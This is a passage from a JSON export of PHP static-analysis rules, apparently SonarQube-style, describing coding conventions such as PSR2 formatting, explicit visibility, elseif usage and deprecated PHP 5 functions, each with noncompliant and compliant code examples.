Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n  <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n  In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar1 = 1;\n   private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. 
Moreover\nsome SCM engines such as Git may handle Windows 'CRLF' end-of-line characters poorly.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The closing <code>?&gt;<\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n  <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n  be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n  the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using lower and upper case interchangeably for PHP keywords and the constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php ECHO 'Hello World'; ?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php echo 'Hello World'; ?&gt;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. 
To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...}  \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\");  \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\"){...}\n\nmakeyogurt(\"raspberry\"); \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} else if ($expr2) {\n  ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} elseif ($expr2) 
{\n  ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such a case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line applications, and in such cases the use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with the help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            exit(23);\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            throw new Exception('Value 42 is not expected.');\n        }\n    }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandards. 
The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002   {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if($thirdThing) {      \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    }\n    else {                 \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n      ...\n    }\n\n    try{                   \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the 
curly brace\n      ...\n    } catch (Exception $e) {\n\u2002\u2002  }\n\n    analyse( $fruit ) ;    \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n    for ($i = 0;$i &lt; 10;   $i++) { \/\/ Noncompliant; there should be exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    pressJuice($apply ,$orange);    \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n    do_something ();       \/\/ Noncompliant; there should not be any space after the method name\n\n    foreach ($fruits    as $fruit_key =&gt;     $fruit) {  \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\nclass ClassB\nextends ParentClass  \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n  ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n    \\Serializable    \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n  public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n    &amp;$arg2, array $arg3 = []) {\n\n    $noArgs_longVars = function () use ($longVar1,         \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n        $longerVar2,\n        $muchLongerVar3\n    ) {\n      ...\n    };\n\n    $foo-&gt;bar($longArgument,    \/\/ Noncompliant; the arguments in a method call should be correctly indented\n      $longerArgument,\n      $muchLongerArgument);     \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n    $closureWithArgsAndVars = function($arg1, $arg2)use   ($var1, $var2) {  \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n      ...\n    };\n  
}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass;             \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n                          \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002           \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n  {\u2002\u2002\u2002\u2002                   \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if ($thirdThing) {    \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    } else {              \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n      ...\n    }\n\n    try {                 \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n      ...\n    } catch (Exception $e) {\n      ...\n    }\n\n    analyse($fruit);      \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n    for ($i = 0; $i &lt; 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    
pressJuice($apply, $orange);   \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n    do_something();       \/\/ Compliant; there is no space after the method name\n\n    foreach ($fruits as $fruit_key =&gt; $fruit) {  \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n  ...\n}\n\nclass ClassB2 extends             \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n  ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n    \\ArrayAccess,         \/\/ Compliant; the list of implemented interfaces is correctly indented\n    \\Countable,\n    \\Serializable\n{\n  \/* Argument lists may be split across multiple lines, where each subsequent line\n   * is indented once. When doing so, the first item in the list should be on the next line,\n   * and there should be only one argument per line. 
Also, when the argument list is\n   * split across multiple lines, the closing parenthesis and opening brace should be\n   * placed together on their own line with one space between them.\n   *\/\n  public function aVeryLongMethodName(\n    ClassTypeHint $arg1,  \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n      &amp;$arg2,\n      array $arg3 = []\n    ) {\n      $noArgs_longVars = function () use (\n        $longVar1,        \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n        $longerVar2,\n        $muchLongerVar3\n      ) {\n        ...\n      };\n\n\n    \/* Argument lists may be split across multiple lines, where each subsequent line is\n     * indented once. When doing so, the first item in the list should be on the next line,\n     * and there should be only one argument per line.\n     *\/\n    $foo-&gt;bar(\n      $longArgument,       \/\/ Compliant; the arguments in the method call are correctly indented\n      $longerArgument,\n      $muchLongerArgument\n    );                     \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n    \/* Closures should be declared with a space after the \"function\" keyword,\n     * and a space before and after the \"use\" keyword.\n     *\/\n    $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n      ...\n    };\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, &quot;extends&quot; and &quot;implements&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closure declarations should be correctly 
spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":"&quot;namespace&quot; declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after &quot;as&quot; keyword and &quot;=&gt;&quot; operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next &quot;else&quot;, &quot;catch&quot; and &quot;finally&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":"&quot;use&quot; declarations should be followed 
by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each &quot;;&quot; in &quot;for&quot; statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":"&quot;use&quot; declarations should be placed after &quot;namespace&quot; declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x &lt; 0) {\n  new foo;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x &lt; 0) {\n  $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. 
At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 1)  \/\/ Noncompliant\n  moveWindowToTheBackground();\n\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  case 1:  \/\/ Noncompliant\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 3)\n  moveWindowToTheBackground();\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches 
in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover, when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\n$b = $a ? 
12 &gt; 4 : 4;  \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n  case 3:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif (($a &gt;= 0 &amp;&amp; $a &lt; 10) || ($a &gt;= 20 &amp;&amp; $a &lt; 50)) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n\ndoOneMoreThing();\n\n$b = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doTheRest();\n}\n\n$b = $a ? 12 &gt; 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n$name = \"George\";\n?&gt;\n&lt;p&gt; Hello &lt;?php echo $name ?&gt;!&lt;\/p&gt;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Files having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n  As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... 
And as of PHP 5.4.0, call-time pass-by-reference\n  was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&amp;$name);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code>&lt;?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest&lt;?php  \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n&lt;?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. 
In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Deprecated<\/th>\n      <th>Use Instead<\/th>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method()<\/code><\/td>\n      <td><code>call_user_func()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method_array()<\/code><\/td>\n      <td><code>call_user_func_array()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>define_syslog_variables()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>dl()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg()<\/code><\/td>\n      <td><code>preg_match()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi()<\/code><\/td>\n      <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_register()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_unregister()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_is_registered()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_socket_blocking()<\/code><\/td>\n      <td><code>stream_set_blocking()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>split()<\/code><\/td>\n      <td><code>preg_split()<\/code><\/td>\n    
<\/tr>\n    <tr>\n      <td><code>spliti()<\/code><\/td>\n      <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>sql_regcase()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_db_query()<\/code><\/td>\n      <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_escape_string()<\/code><\/td>\n      <td><code>mysql_real_escape_string()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td>Passing locale category names as strings<\/td>\n      <td>Use the LC_* family of constants<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password);  \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. 
However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php';  \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php';  \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n  include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". 
